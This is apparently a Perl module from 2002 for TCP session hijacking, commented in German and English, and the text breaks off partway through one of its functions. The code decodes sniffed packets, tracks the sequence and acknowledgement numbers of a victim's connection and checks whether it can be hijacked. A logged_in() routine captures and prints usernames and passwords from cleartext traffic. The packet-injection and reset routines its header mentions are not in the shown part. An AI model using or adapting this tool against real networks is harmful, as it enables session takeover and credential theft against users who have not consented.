hijack.pm

一个rst守护程序

package hijack;

# Module to store all the hijacking stuff
# This modul can be run in stateful or stateless mode
# Currently it only supports TCP hijacking methods like:
# - injecting a packet
# - greet the victim client
# - resetting a connection
#
# For more information please read the POD documentation
#
# Programmed by Bastian Ballmann [ bytebeater@crazydj.de ]
# http://www.crazydj.de
#
# Last Update: 28.11.2002
#
# This code is licensed under the GPL


###[ Loading modules ]###

use NetPacket::Ethernet qw(:strip); # Decoding ethernet packets
use NetPacket::IP qw(:strip);       # Decoding IP packets
use NetPacket::TCP;                 # Decoding TCP packets
use Net::RawIP;                     # Creating raw packets



###[ Konstruktor ]###

# Erstellt aus einer Net::PcapUtils Paket Referenz ein Hijack Objekt
# Zur Zeit wird nur TCP/IP unterstuetzt
# Default Modus ist stateless.
# Es wird also per default nicht zwischen Server und Client unterschieden
# Parameter: Pcap packet object
sub new
{
    ($class, $packet) = @_;
    my $obj = {};

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{src_ip} = $ip->{src_ip};         # Current source ip (stateless mode)
    $obj->{dest_ip} = $ip->{dest_ip};       # Current destination ip (stateless mode)
    $obj->{src_port} = $tcp->{src_port};    # Current source port (stateless mode)
    $obj->{dest_port} = $tcp->{dest_port};  # Current destination port (stateless mode)
    $obj->{seqnum} = $tcp->{seqnum};        # Current sequence number (stateless mode)
    $obj->{acknum} = $tcp->{acknum};        # Current acknowledgement number (stateless mode)
    $obj->{flags} = $tcp->{flags};          # Current TCP flags
    $obj->{hijacked} = [];                  # Array to store hijacked connections
    $obj->{login_flag} = 0;                 # Flag to remember if we have seen a correct login process
    $obj->{stateful} = 0;                   # Flag to remember if we run in stateless or stateful mode
    $obj->{server_ip} = "";                 # Server IP (stateful mode)
    $obj->{client_ip} = "";                 # Client IP (stateful mode)
    $obj->{server_port} = "";               # Server Port (stateful mode)
    $obj->{client_port} = "";               # Client Port (stateful mode)
    $obj->{server_seq} = "";                # Server Sequence Nummer (stateful mode)
    $obj->{server_ack} = "";                # Server Acknowledgement Nummer (stateful mode)
    $obj->{client_seq} = "";                # Client Sequence Nummer (stateful mode)
    $obj->{client_ack} = "";                # Client Acknowledgement Nummer (stateful mode)

    return bless($obj,$class);
}



###[ General methods ]###

# Methode check() ueberprueft ob das Paket zu "unser" Verbindung gehoert
# Parameter: Pcap packet object
sub check
{
    my ($obj,$packet) = @_;
    my ($src_ip,$dest_ip,$src_port,$dest_port);

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
	# Packet kommt vom Server zu unserem Client
	if( ($obj->{server_ip} eq $ip->{src_ip}) &&
	    ($obj->{client_ip} eq $ip->{dest_ip}) &&
	    ($obj->{server_port} eq $tcp->{src_port}) &&
	    ($obj->{client_port} eq $tcp->{dest_port}) &&
	    ($tcp->{winsize} ne "2323") )
	{
	    return 1;
	}
	# Das Paket kommt von unserem Client und will zum Server
	elsif( ($obj->{client_ip} eq $ip->{src_ip}) &&
	    ($obj->{server_ip} eq $ip->{dest_ip}) &&
	    ($obj->{client_port} eq $tcp->{src_port}) &&
	    ($obj->{server_port} eq $tcp->{dest_port}) &&
	    ($tcp->{winsize} ne "2323") )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }

    # We are running in stateless mode
    else
    {
	if( ($obj->{src_ip} eq $ip->{src_ip}) && 
	    ($obj->{dest_ip} eq $ip->{dest_ip}) && 
	    ($obj->{src_port} eq $tcp->{src_port}) && 
	    ($obj->{dest_port} eq $tcp->{dest_port}) &&
	    ($tcp->{winsize} ne "2323") )
	{
	    return 1;
	}
	elsif( ($obj->{src_ip} eq $ip->{dest_ip}) &&
	       ($obj->{dest_ip} eq $ip->{src_ip}) &&
	       ($obj->{src_port} eq $tcp->{dest_port}) &&
	       ($obj->{dest_port} eq $tcp->{src_port}) &&
	       ($tcp->{winsize} ne "2323") )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
}


# Methode check_port ueberprueft, ob das Paket den gewuenschten Source- bzw.
# Destination Port enthaelt.
# Parameter: packet object, src and dest port
# Falls ein Port nicht interessiert, dann uebergibt man entweder 0 oder NULL
sub check_port
{
    my ($obj,$packet,$src_port,$dst_port) = @_;

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    # Source port interessiert nicht, check nur Destination port
    if( ($src_port == 0) || ($src_port eq "NULL") )
    {
	if($tcp->{dest_port} eq $dst_port)
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
    
    # Destination port interessiert nicht, check nur den Source port
    elsif( ($dst_port == 0) || ($dst_port eq "NULL") )
    {
	if($tcp->{src_port} eq $src_port)
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }

    # Check ob beide Ports stimmen
    else
    {
	if( ($tcp->{src_port} eq $src_port) && ($tcp->{dest_port} eq $dst_port) )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
}


# Die Methode check_ip ueberprueft, ob das Paket die gewuenschte Source- bzw.
# Destination IP enthaelt.
# Falls eine IP nicht interessiert, dann uebergibt man entweder 0 oder NULL
# Parameter: packet object, src and dest ip
sub check_ip
{
    my ($obj,$packet,$src_ip,$dst_ip) = @_;

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));

    # Source IP interessiert nicht
    if( ($src_ip == 0) || ($src_ip == "NULL") )
    {
	if($dst_ip eq $ip->{dest_ip})
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }

    # Destination IP interessiert nicht
    elsif( ($dst_ip == 0) || ($dst_ip eq "NULL") )
    {
	if($src_ip eq $ip->{src_ip})
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }

    # Ueberpruefe beide IPs
    elsif( ($ip->{src_ip} eq $src_ip) && ($ip->{dest_ip} eq $dst_ip) )
    {
	return 1;
    }
    else
    {
	return 0;
    }
}


# Methode check_flag ueberprueft, ob das Paket das gewuenschte Flag
# gesetzt hat.
# Parameter: packet object, flag
sub check_flag
{
    my($obj,$packet,$flag) = @_;

    $flag = lc($flag);

    # Decode the packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $flags{urg} = 0x20;
    $flags{ack} = 0x10;
    $flags{psh} = 0x08;
    $flags{rst} = 0x04;
    $flags{syn} = 0x02;
    $flags{fin} = 0x01;

    if($tcp->{flags} & $flags{$flag})
    {
	return 1;
    }
    else
    {
	return 0;
    }
}


# Methode stateful setzt die Server / Client Eigenschaften
# Jetzt weiss unser Modul in welche Richtung ein Packet gehoert
# Parameter: Net::PcapUtils packet object, Source (server|client)
sub stateful
{
    my($obj,$packet,$src) = @_;

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    # Connection should be observed in stateful mode
    $obj->{stateful} = 1;

    # Das Paket kommt vom Server
    if($src eq "server")
    {
	$obj->{server_ip} = $ip->{src_ip};
	$obj->{client_ip} = $ip->{dest_ip};
	$obj->{server_port} = $tcp->{src_port};
	$obj->{client_port} = $tcp->{dest_port};
	$obj->{server_seq} = $tcp->{seqnum};
	$obj->{server_ack} = $tcp->{acknum};
    }
    elsif($src eq "client")
    {
	$obj->{server_ip} = $ip->{dest_ip};
	$obj->{client_ip} = $ip->{src_ip};
	$obj->{server_port} = $tcp->{dest_port};
	$obj->{client_port} = $tcp->{src_port};
	$obj->{client_seq} = $tcp->{seqnum};
	$obj->{client_ack} = $tcp->{acknum};
    }	
    else
    {
	print "Unkown option $src in method stateful()\n";
    }

    return $obj;
}


# Die Methode stateless gibt dem Modul bekannt, dass wir nicht mehr
# im stateful Modus laufen wollen
sub stateless
{
    $obj = shift;
    $obj->{stateful} = 0;
    return $obj;
}



# Methode set_server_seq() speichert die Server Sequence- und Acknowledgenummer.
# Parameter: Net::PcapUtils packet object
sub set_server_seq
{
    my($obj,$packet) = @_;

    # Are we running in stateful mode?
    unless($obj->{stateful}) 
    { 
	print "You are not running in stateful mode.\n";
	print "set_server_seq() aborts!\n"; 
	return 0; 
    }

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{server_seq} = $tcp->{seqnum};
    $obj->{server_ack} = $tcp->{ackum};
    return $obj;
}



# Methode set_client_seq() speichert die Client Sequence- und Acknowledgenummer.
# Parameter: Net::PcapUtils packet object
sub set_client_seq
{
    my($obj,$packet) = @_;

    # Are we running in stateful mode?
    unless($obj->{stateful}) 
    { 
	print "You are not running in stateful mode.\n";
	print "set_client_seq() aborts!\n"; 
	return 0; 
    }

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{client_seq} = $tcp->{seqnum};
    $obj->{client_ack} = $tcp->{ackum};
    return $obj;
}



# Methode server_seq gibt true zurueck, wenn die Sequence- und
# Acknowledgementnummer vom Server bekannt ist
sub server_seq
{
    my $obj = shift;

    if( ($obj->{server_seq}) && ($obj->{server_ack}) && ($obj->{server_seq} != 0) && ($obj->{server_ack} != 0) )
    {
	return 1
    }
    else
    {
	return 0;
    }
}



# Methode client_seq gibt true zurueck, wenn die Sequence- und
# Acknowledgementnummer vom Client bekannt ist
sub client_seq
{
    my $obj = shift;

    if( ($obj->{client_seq}) && ($obj->{client_ack}) && ($obj->{client_seq} != 0) && ($obj->{client_ack} != 0) )
    {
	return 1;
    }
    else
    {
	return 0;
    }
}


# Methode is_established() ueberprueft ob der TCP Handshake schon erfolgt
# ist (anders gesagt, ob es sich um ein ACK Paket und nicht SYN oder 
# SYN/ACK handelt)
sub is_established
{
    my($obj,$packet) = @_;

    # Hat das Paket das SYN Flag gesetzt?
    if($obj->check_flag($packet,"syn"))
    {
	return 0;
    }
    else
    {
	return 1;
    }
}


# Die Methode logged_in() versucht einen Login Vorgang
# mit zu lesen anhand der Strings USER und PASS
# Diese Methode is noch zu buggy, um sie zu verwenden
sub logged_in
{
    my($obj,$packet) = @_;

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});
    my $payload = $tcp->{data};

    if( (($payload =~ /USER/i) || ($payload =~ /login/i)) && !($payload =~ /last\s*login/ig) )
    {
	print "Found login string\n";
	$obj->{loign_flag} = 1;
	return 0;
    }
    elsif(($payload =~ /password/i) || ($payload =~ /PASS/i))
    {
	print "Found password string\n";
	$obj->{login_flag} = 2;
	return 0;
    }
    elsif($payload =~ /last\s*login/ig)
    {
	print "Found last login message\n";
	$obj->{login_flag} = 3;
    }

    if($obj->{login_flag} == 1)
    {
	$obj->{login} = $payload;
	$obj->{login_flag} = 0;
	print "User $payload\n";
    }
    elsif($obj->{login_flag} == 2)
    {
	$obj->{password} = $payload;
	$obj->{login_flag} = 0;
	print "Password $payload\n";
    }

    if($obj->{login_flag} == 3)
    {
	print "User logged in\n";
	return 1;
    }
    else
    {
	return 0;
    }
    
}

# Methode update() updated die Objekt Eigenschaften mit den Eigenschaften
# aus einem Net::PcapUtils Paket Objekt
# Diese Methode updated die Verbindungsinformationen im stateless Modus
sub update
{
    my ($obj, $packet) = @_;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
	print "You are running in stateful mode.\n";
	print "update() aborted!\n";
	return 0;
    }

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{src_ip} = $ip->{src_ip};
    $obj->{dest_ip} = $ip->{dest_ip};
    $obj->{src_port} = $tcp->{src_port};
    $obj->{dest_port} = $tcp->{dest_port};
    $obj->{seqnum} = $tcp->{seqnum};
    $obj->{acknum} = $tcp->{acknum};
    $obj->{flags} = $tcp->{flags};

    return $obj;
}



# Methode update_seq() updated nur die Sequence und
# Acknowledgement Number
# Diese Methode updated die Verbindungsinformationen im stateless Modus
sub update_seq
{
    my ($obj, $packet) = @_;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
	print "You are running in stateful mode.\n";
	print "update_seq() aborted!\n";
	return 0;
    }

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{seqnum} = $tcp->{seqnum};
    $obj->{acknum} = $tcp->{acknum};

    return $obj;
}


# Methode is_hijackable ueberprueft ob die Verbindung
# gehijackt werden kann.
# Also ob die Sequence und Acknowledgement Number mit
# gelesen werden kann.
sub is_hijackable
{
    my $obj = shift;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
	if( ($obj->{client_seq}) && ($obj->{client_ack}) && ($obj->{server_seq}) && ($obj->{server_ack}) )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
    # We are running in stateless mode
    else
    {
	if( ($obj->{seqnum}) && ($obj->{acknum}) )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
}


# Methode is_hijacked merkt sich, dass wir die Verbindung schon gehijackt haben
# Parameter: Pcap packet object
sub is_hijacked
{
    $obj = shift;
    my $packet = shift;

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    push @{$obj->{hijacked}},$ip->{src_ip} . " " . $ip->{dst_ip};
    return $obj;
}

# Diese Methode dient dazu eine oder alle IPs aus dem hijacked Array
# zu entfernen, damit die Verbidnung erneut gehijackt werden kann
# Als Parameter kann eine IP angegeben werden, die aus dem Array 
# geschmissen werden soll. Falls kein Parameter angegeben wird, wird
# das komplette Array geloescht
sub unset_hijacked
{
    my $obj = shift;
    my $src = shift;
    my $dst = shift;

    # Loesche einen Eintrag anhand der Source und Destination IP
    if(($src ne "") && ($dst ne ""))
    {
	# Durchwuehle das Hijacked Array nach der Source und Destination IP